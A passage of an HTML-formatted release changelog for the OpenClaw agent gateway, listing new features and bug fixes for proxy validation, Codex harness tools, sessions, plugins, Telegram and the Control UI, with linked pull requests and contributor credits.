<p>CLI/proxy: add <code>openclaw proxy validate</code> so operators can verify effective proxy configuration, proxy reachability, and expected allow/deny destination behavior before deploying proxy-routed OpenClaw commands. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341892839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73438" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73438/hovercard" href="https://github.com/openclaw/openclaw/pull/73438">#73438</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</p>
</li>
<li>
<p>Agents/Codex: default Codex app-server dynamic tools to native-first, keeping OpenClaw integration tools while leaving file, patch, exec, and process ownership to the Codex harness. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361939028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75308" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75308/hovercard" href="https://github.com/openclaw/openclaw/pull/75308">#75308</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Agents/Codex: default Codex-harness direct source replies to the OpenClaw <code>message</code> tool when visible reply delivery is not explicitly configured, keeping channel-visible output as a deliberate tool call. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Heartbeats/agents: add a structured <code>heartbeat_respond</code> tool for tool-capable heartbeat runs so agents can record quiet outcomes or explicit notification text without relying only on <code>HEARTBEAT_OK</code> parsing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365795107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75765/hovercard" href="https://github.com/openclaw/openclaw/pull/75765">#75765</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Gateway/config: allow <code>$include</code> directives to read files from operator-approved <code>OPENCLAW_INCLUDE_ROOTS</code> directories while preserving default config-directory confinement. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ificator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ificator">@ificator</a>.</p>
</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>
<p>Agents/OpenAI: default GPT-5 API-key sessions to the SSE Responses transport unless WebSocket is explicitly selected, restoring replies in fresh Control UI and WebChat beta installs where the auto WebSocket path connected but produced no model events.</p>
</li>
<li>
<p>Agents/sessions: preserve terminal lifecycle state when final run metadata persists from a stale in-memory snapshot, preventing sessions from staying stuck as running after completed or timed-out turns.</p>
</li>
<li>
<p>Gateway/CLI: make <code>openclaw gateway start</code> repair stale managed service definitions that point at old OpenClaw versions, missing binaries, or temporary installer paths before starting.</p>
</li>
<li>
<p>Updates/plugins: keep packaged upgrades and beta external plugin installs on stable runtime aliases and matching prerelease npm specs, avoiding stale WebChat runtime chunks and old Twitch packages after upgrading from 2026.4.29.</p>
</li>
<li>
<p>Codex/app-server: resolve managed binaries from bundled <code>dist</code> chunks and from the <code>@openai/codex</code> package bin when installs do not provide a nearby <code>.bin/codex</code> shim, avoiding false missing-binary startup failures.</p>
</li>
<li>
<p>Status: show the <code>openai-codex</code> OAuth profile for <code>openai/gpt-*</code> sessions running through the native Codex runtime instead of reporting auth as unknown. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369662899" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76197" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76197/hovercard" href="https://github.com/openclaw/openclaw/pull/76197">#76197</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: use the ClawHub artifact resolver response as the install decision before downloading, keeping legacy ZIP fallback and future ClawPack npm-pack installs on the same explicit resolver path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: keep bare plugin package specs on npm for the launch cutover and reserve ClawHub resolution for explicit <code>clawhub:</code> specs until ClawHub pack readiness is deployed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/source checkout: discover source-only plugins such as Codex from the <code>extensions/*</code> workspace while using npm package excludes as the packaged-core boundary, removing the stale core-bundle metadata path.</p>
</li>
<li>
<p>Plugins/ClawHub: install ClawPack artifacts from the explicit npm-pack <code>.tgz</code> resolver path and persist artifact kind, npm integrity, shasum, and tarball metadata for update and diagnostics flows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Control UI: allow deployments to configure grouped chat message max-width with a validated <code>gateway.controlUi.chatMessageMaxWidth</code> setting instead of patching bundled CSS after upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279800285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67935" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67935/hovercard" href="https://github.com/openclaw/openclaw/issues/67935">#67935</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiew4589-lang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiew4589-lang">@xiew4589-lang</a>.</p>
</li>
<li>
<p>Control UI/Cron: ignore malformed persisted cron rows without valid payloads before they enter UI state and guard stale cron render paths, preventing blank Control UI sections after a bad cron snapshot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141837644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55047" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55047/hovercard" href="https://github.com/openclaw/openclaw/issues/55047">#55047</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4134780011" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54439" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54439/hovercard" href="https://github.com/openclaw/openclaw/issues/54439">#54439</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136558129" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54550" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54550/hovercard" href="https://github.com/openclaw/openclaw/pull/54550">#54550</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136644421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54552" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54552/hovercard" href="https://github.com/openclaw/openclaw/pull/54552">#54552</a>.</p>
</li>
<li>
<p>Control UI/sessions: bound the default Sessions tab query to recent activity and fewer rows, avoiding expensive full-history loads while keeping filters editable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768078" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76050/hovercard" href="https://github.com/openclaw/openclaw/issues/76050">#76050</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368768844" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76051" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76051/hovercard" href="https://github.com/openclaw/openclaw/pull/76051">#76051</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Neomail2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Neomail2">@Neomail2</a>.</p>
</li>
<li>
<p>Gateway/channels: cap startup fanout at four channel/account handoffs and recover from Bonjour ciao self-probe races, reducing Windows startup stalls with many Telegram accounts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364841887" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75687/hovercard" href="https://github.com/openclaw/openclaw/issues/75687">#75687</a>.</p>
</li>
<li>
<p>Gateway/sessions: keep <code>sessions.list</code> polling responsive on large session stores by reusing list-safe session cache/indexes and returning a lightweight compaction checkpoint preview instead of heavyweight summaries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rolandrscheel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rolandrscheel">@rolandrscheel</a>.</p>
</li>
<li>
<p>Control UI/Gateway: keep long-running dashboard WebSocket sessions alive with protocol pings and keep Stop available after reconnect or reload by recovering session-scoped active-run abort state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321259716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70991" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70991/hovercard" href="https://github.com/openclaw/openclaw/issues/70991">#70991</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>.</p>
</li>
<li>
<p>CLI/update: treat inherited Gateway service markers as origin hints and only block package replacement when the managed Gateway is still live, so self-updates can stop the service and continue safely. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365329462" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75729" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75729/hovercard" href="https://github.com/openclaw/openclaw/pull/75729">#75729</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hxy91819/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hxy91819">@hxy91819</a>.</p>
</li>
<li>
<p>Agents/failover: exempt run-level timeouts that fire during tool execution from model fallback, timeout-triggered compaction, and generic timeout payload synthesis, avoiding misleading "LLM request timed out" errors after the primary model has already responded. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115327379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52147" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52147/hovercard" href="https://github.com/openclaw/openclaw/issues/52147">#52147</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367303713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75873/hovercard" href="https://github.com/openclaw/openclaw/pull/75873">#75873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simonusa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simonusa">@simonusa</a>.</p>
</li>
<li>
<p>Docker: copy Bun 1.3.13 from a digest-pinned image and keep CI on the same version. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350919036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74356" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74356/hovercard" href="https://github.com/openclaw/openclaw/issues/74356">#74356</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</p>
</li>
<li>
<p>Agents/compaction: keep prior context on consecutive turns against z.ai-style providers (z.ai direct, openrouter z-ai/*, in-house GLM gateways), avoiding accidental Pi state reset after successful turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368789014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76056" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76056/hovercard" href="https://github.com/openclaw/openclaw/pull/76056">#76056</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</p>
</li>
<li>
<p>Doctor/plugins: run a one-time 2026.5.2 configured-plugin install repair based on <code>meta.lastTouchedVersion</code>, installing actively used downloadable OpenClaw plugins through the configured external source before marking the config touched for the release.</p>
</li>
<li>
<p>Sessions/transcripts: use one <code>session.writeLock.acquireTimeoutMs</code> policy for session transcript lock acquisitions and raise the default wait to 60 seconds, avoiding user-visible lock timeouts during legitimate slow prep, cleanup, compaction, and mirror work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529883" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75894" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75894/hovercard" href="https://github.com/openclaw/openclaw/issues/75894">#75894</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shandutta/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shandutta">@shandutta</a>.</p>
</li>
<li>
<p>Control UI: contain the standalone iOS PWA viewport with safe-area-aware document locking, so Add-to-Home-Screen launches cannot scroll past the device bounds. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368888109" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76072" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76072/hovercard" href="https://github.com/openclaw/openclaw/pull/76072">#76072</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kvncrw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kvncrw">@kvncrw</a>.</p>
</li>
<li>
<p>Agents/restart recovery: match cleaned transcript locks by exact transcript lock paths plus the canonical session fallback, so interrupted main sessions using topic-suffixed transcripts resume after gateway restart. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368769053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76052" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76052/hovercard" href="https://github.com/openclaw/openclaw/pull/76052">#76052</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anyech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anyech">@anyech</a>.</p>
</li>
<li>
<p>Agents/runtime: cache the stable system-prompt prefix and reuse prompt-report tool schema stats during dispatch prep, reducing repeated CPU work before streaming starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368424894" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75999" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75999/hovercard" href="https://github.com/openclaw/openclaw/issues/75999">#75999</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368807955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76061" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76061/hovercard" href="https://github.com/openclaw/openclaw/issues/76061">#76061</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zackchiutw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zackchiutw">@zackchiutw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/STLI69/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/STLI69">@STLI69</a>.</p>
</li>
<li>
<p>Control UI/WebChat: use high-contrast text selection colors so highlighted chat text stays visible across themes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204728608" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60850/hovercard" href="https://github.com/openclaw/openclaw/issues/60850">#60850</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204759217" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60854" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60854/hovercard" href="https://github.com/openclaw/openclaw/pull/60854">#60854</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Badschaff/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Badschaff">@Badschaff</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>.</p>
</li>
<li>
<p>Telegram/native commands: pass persisted session files into plugin commands for topic-bound sessions, so <code>/codex bind</code> works from Telegram forum topics. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367067083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75845" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75845/hovercard" href="https://github.com/openclaw/openclaw/pull/75845">#75845</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368766599" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76049" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76049/hovercard" href="https://github.com/openclaw/openclaw/pull/76049">#76049</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MatthewSchleder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MatthewSchleder">@MatthewSchleder</a>.</p>
</li>
<li>
<p>Security audit/plugins: ignore plugin install backup, disabled, and dependency debris directories when enumerating installed plugin roots, avoiding false-positive findings for <code>.openclaw-install-backups</code> after plugin updates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363085900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75456" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75456/hovercard" href="https://github.com/openclaw/openclaw/issues/75456">#75456</a>.</p>
</li>
<li>
<p>Telegram: honor runtime conversation bindings for native slash commands in bound top-level groups, so commands like <code>/status@bot</code> route to the active non-<code>main</code> session instead of falling back to the default route. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362659532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75405" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75405/hovercard" href="https://github.com/openclaw/openclaw/issues/75405">#75405</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363728120" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75558" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75558/hovercard" href="https://github.com/openclaw/openclaw/pull/75558">#75558</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ziptbm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ziptbm">@ziptbm</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</p>
</li>
<li>
<p>Gateway/tasks: make task registry maintenance use pass-local backing-session lookups and fresh active child-session indexes, avoiding repeated full task snapshots and session-store clones on large stale registries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342683931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73517/hovercard" href="https://github.com/openclaw/openclaw/issues/73517">#73517</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365145364" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75708" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75708/hovercard" href="https://github.com/openclaw/openclaw/issues/75708">#75708</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351414705" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74406" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74406/hovercard" href="https://github.com/openclaw/openclaw/pull/74406">#74406</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365146597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75709" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75709/hovercard" href="https://github.com/openclaw/openclaw/pull/75709">#75709</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lightningxxl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lightningxxl">@Lightningxxl</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/glfruit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/glfruit">@glfruit</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jared-rebel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jared-rebel">@jared-rebel</a>.</p>
</li>
<li>
<p>Auth/sessions: JSON-clone auth-profile cache/runtime snapshots and remaining session cleanup previews instead of using <code>structuredClone</code>, preserving mutation isolation while avoiding native-memory growth on large stores. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4073238042" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45438/hovercard" href="https://github.com/openclaw/openclaw/issues/45438">#45438</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/markus-lassfolk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/markus-lassfolk">@markus-lassfolk</a>.</p>
</li>
<li>
<p>Models CLI: restore <code>openclaw models list --provider &lt;id&gt;</code> catalog and registry fallback rows for unconfigured providers, so provider-specific verification commands no longer report "No models found." Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363447158" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75517/hovercard" href="https://github.com/openclaw/openclaw/issues/75517">#75517</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364131001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75615" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75615/hovercard" href="https://github.com/openclaw/openclaw/pull/75615">#75615</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lotsoftick/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lotsoftick">@lotsoftick</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</p>
</li>
<li>
<p>Gateway/macOS: write LaunchAgent services with a canonical system PATH and stop preserving old plist PATH entries, so Volta, asdf, fnm, and pnpm shell paths no longer affect gateway child-process Node resolution. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360722639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75233" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75233/hovercard" href="https://github.com/openclaw/openclaw/issues/75233">#75233</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360954515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75246" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75246/hovercard" href="https://github.com/openclaw/openclaw/pull/75246">#75246</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nphyde2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nphyde2">@nphyde2</a>.</p>
</li>
<li>
<p>Slack/hooks: preserve bot alert attachment text in message-received hook content when command text is blank. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368641515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76035" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76035/hovercard" href="https://github.com/openclaw/openclaw/issues/76035">#76035</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368643379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76036" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76036/hovercard" href="https://github.com/openclaw/openclaw/pull/76036">#76036</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amsminn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amsminn">@amsminn</a>.</p>
</li>
<li>
<p>Sessions/agents: route Gateway session-store writes, CLI cleanup maintenance, and agent-delete session purges through a dedicated in-process writer and borrow the validated mutable cache during the writer slot, avoiding runtime file locks plus repeated <code>sessions.json</code> rereads and JSON clones on hot metadata updates. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288028893" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68554" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68554/hovercard" href="https://github.com/openclaw/openclaw/pull/68554">#68554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/henkterharmsel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/henkterharmsel">@henkterharmsel</a>.</p>
</li>
<li>
<p>Control UI/chat: show inline feedback when local slash-command dispatch is unavailable or fails unexpectedly instead of clearing the composer silently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115024686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52105" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52105/hovercard" href="https://github.com/openclaw/openclaw/issues/52105">#52105</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MooreQiao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MooreQiao">@MooreQiao</a>.</p>
</li>
<li>
<p>Memory/markdown: replace CRLF managed blocks in place and collapse duplicate marker blocks without rewriting unmanaged markdown, so Dreaming and Memory Wiki files self-heal from repeated generated sections. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363293115" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75491" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75491/hovercard" href="https://github.com/openclaw/openclaw/issues/75491">#75491</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363308439" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75495/hovercard" href="https://github.com/openclaw/openclaw/pull/75495">#75495</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366593323" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75810" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75810/hovercard" href="https://github.com/openclaw/openclaw/pull/75810">#75810</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368473075" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76008" data-hovercard-type="pull_request" 